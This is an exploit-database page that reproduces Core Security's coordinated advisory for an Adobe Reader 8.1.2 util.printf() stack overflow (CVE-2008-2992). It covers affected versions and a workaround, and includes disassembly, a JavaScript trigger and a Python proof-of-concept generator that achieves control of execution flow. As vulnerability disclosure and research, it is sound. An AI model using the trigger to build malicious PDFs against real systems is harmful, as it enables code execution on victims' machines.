[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit

Author
Elazar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7810
Category
local exploits
Date add
05-11-2008
Platform
unsorted
=====================================================================
Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
=====================================================================

Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit
author: Elazar

Adobe Reader Javascript Printf Buffer Overflow
1. Advisory Information

Title: Adobe Reader Javascript Printf Buffer Overflow
Advisory ID: CORE-2008-0526
Advisory URL: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
Date published: 2008-11-04
Date of last update: 2008-11-04
Vendors contacted: Adobe
Release mode: Coordinated release
2. Vulnerability Information

Class: Buffer overflow
Remotely Exploitable: Yes (client-side)
Locally Exploitable: Yes
Bugtraq ID: 30035
CVE Name: CVE-2008-2992
3. Vulnerability Description

Adobe Reader is arguably the world's most ubiquitous electronic document sharing application. The software can be used to view, search, digitally sign, verify, print, and collaborate on Adobe PDF files, and includes scripting functionality to allow for extended customization and extensibility.

Adobe Reader suffers from a stack buffer overflow when parsing specially crafted (invalid) PDF files. The vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the "util.printf()" JavaScript function. Successful exploitation of the vulnerability requires that users open a maliciously crafted PDF file thereby allowing attackers to gain access to vulnerable systems and assume the privileges of a user running Acrobat Reader. Adobe Reader version 9, which was released in June 2008, is not vulnerable to the reported problem.
4. Vulnerable packages

    * Adobe Reader 8.1.2
    * Acrobat 8.1.2

5. Non-vulnerable packages

    * Adobe Reader 9
    * Acrobat 9
    * Adobe Reader 8.1.3
    * Acrobat 8.1.3

6. Vendor Information, Solutions and Workarounds

Adobe will issue a security update that addresses the vulnerable version 8.1.2 of Reader.

Alternatively, a possible workaround for this vulnerability is to disable JavaScript in Adobe Reader and Acrobat (in the software's Edit/Preferences menu). Disabling JavaScript will prevent the issue, although it will also prevent many basic Acrobat and Reader workflows from properly functioning.
7. Credits

The CVE-2008-2992 vulnerability was discovered by Damian Frizza from the CORE IMPACT Exploit Writers Team at Core Security Technologies while investigating the feasibility of exploiting a bug in Foxit Reader that had been disclosed in May 2008. The CVE-2008-1104 vulnerability was discovered in Foxit Reader by Dyon Balding from Secunia Research.
8. Technical Description / Proof of Concept Code

While investigating the feasibility of exploiting the vulnerability previously disclosed in Foxit Reader (CVE-2008-1104) [1] we found that Adobe Reader was affected by the same bug. After an initial examination of the involved implementation bug, it was believed that although present, the problem was apparently not exploitable in Adobe Reader due to the use of two structured exception handlers in the program. The primary difference between the Adobe and Foxit applications is the manner in which they perform security checks, and at first glance, it seemed as if the bug was not exploitable in Reader, since there was no way to control the program's first exception handler.

However, upon further examination of the code, we found that another overflow occurs before the call to the involved code is made in relation to the previously known vulnerability. This new problem was identified in the way vulnerable versions of Adobe Reader implement the JavaScript util.printf() function. The function first converts the argument it receives to a String, using only the first 16 digits of the argument and padding the rest with a fixed value of "0" (0x30). By passing an overly long and properly formatted command to the function it is possible to overwrite the program's memory and control its execution flow.

A specifically crafted PDF file that embeds JavaScript code to manipulate the program's memory allocation pattern and trigger the vulnerability can allow an attacker to execute arbitrary code with the privileges of a user running the Adobe Reader application.

We now present the details of the vulnerability. The original Secunia advisory concerning Foxit Reader stated: "the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the util.printf() JavaScript function." While researching this bug we found that the following Javascript code triggers the bug: 

var num = 1.2
util.printf("%5000f",num)

 These two simple Javascript lines cause the byte 0x20 to be copied 5000 times on the stack. This allows to take control of the exception handler, and also to trigger an exception when trying to write in the section that comes after the stack.

By filling somehow the heap until the address 0x20202020, for example by doing a heap spray from the Javascript, an exploit can be made for Foxit Reader.

After a Proof of Concept PDF file was crafted, we tried to open it with Adobe Reader 8.1.2. The application closed without warning, without crash, simply closed.

By disassembling the DLL library Escript.api, we reached this code: 

238AF9C5    PUSH EDI
238AF9C6    PUSH 20
238AF9C8    PUSH ESI
238AF9C9    CALL MSVCR80.memset

 This is exactly the same bug, where EDI is the size to be copied, controlled by the attacker, and ESI is the destination, pointing to a buffer in the stack.

The program generates an exception here: 

78144AFF   REP STOS DWORD PTR ES:[EDI]

 inside the code of the memset function, when trying to write in the section that comes after the stack.

We examined the active SEH (Structured Exception Handlers), and found that in this case (unlike the Foxit case), we have two SEH: 

Address    SE handler
0012EE70   EScript.238F6F95
0012F140   20202020
  
One has been completely overwritten by us, and the other not. The code of the first handler is:

238F6F95    MOV EDX,DWORD PTR SS:[ESP+8]
    238F6F99    LEA EAX,DWORD PTR DS:[EDX+C]
    238F6F9C    MOV ECX,DWORD PTR DS:[EDX-58]
    238F6F9F    XOR ECX,EAX
    238F6FA1    CALL EScript.23806D28     Security Cookie Check 1
    238F6FA6    MOV ECX,DWORD PTR DS:[EDX+22C]
    238F6FAC    XOR ECX,EAX
    238F6FAE    CALL EScript.23806D28    Security Cookie Check 2
    238F6FB3    MOV EAX,EScript.2391B54C
    238F6FB8    JMP MSVCR80.__CxxFrameHandler3

 When the exception is generated, this handler takes the control and is charged of checking two security cookies. One of them has been overwritten, so the execution jumps directly to ExitProcess.

Until now, the difference between the two bugs is only the cookies check. In Foxit we have the following structure on the stack: 

Memset Buffer
    RET
    ...
    ...
    SEH
    ...
    ...

Whereas in Adobe Reader we basically have:

SEH1              --> Security Cookie Check
    ...
    Memset Buffer
    SecurityCookie
    RET
    ...
    SEH2             --> Overwritten with 0x20202020

At first sight, it seems that this bug in not exploitable, since there is no way to control the first handler. But... looking at the code, we found that before the vulnerable call to memset, another overflow occurs. As a first step, the program transforms the argument received by the function util.printf() to a String here:

238AF8D1   FSTP QWORD PTR SS:[ESP]
    238AF8D4   CALL DWORD PTR DS:[MSVCR80._fcvt]

The function returns only the first 16 digits, and the rest is padded with "0" (0x30). This is copied to the stack here: 

238AF946    MOV EAX,DWORD PTR SS:[EBP-28]
    238AF949    MOV AL,BYTE PTR DS:[EAX+EDX]
    238AF94C   MOV BYTE PTR DS:[ESI+EDI],AL      # copy to the stack
    238AF94F    INC EDI
    238AF950    INC EDX
    238AF951    CMP EDX,ECX

After this copy is completed, the stack has the following disposition: 

Float To String Buffer
    ...
    ...
    SEH1      --> Overwritten with 0x30303030
    ...
    ...
    Memset Buffer
    ...
    ...
    SEH2     -->  Overwritten with 0x20202020
    ...
    ...

 If we call the vulnerable function with a long enough number, we can avoid the cookies check and jump to the address 0x30303030. By allocating memory somehow and copying our shellcode there, we can execute arbitrary code in the context of the application.

The following Python code generates a PoC Javascript code: 

fill = 276 * '8'
      script="""
      var num = 12999999999999999999_FILL_
      util.printf("%45000f",num)
      """
      script = script.replace('_FILL_', fill)

      print script

By embedding the generated script in a PDF file, we got an Access violation when executing [30303030]. 




#  0day.today [2024-06-15]  #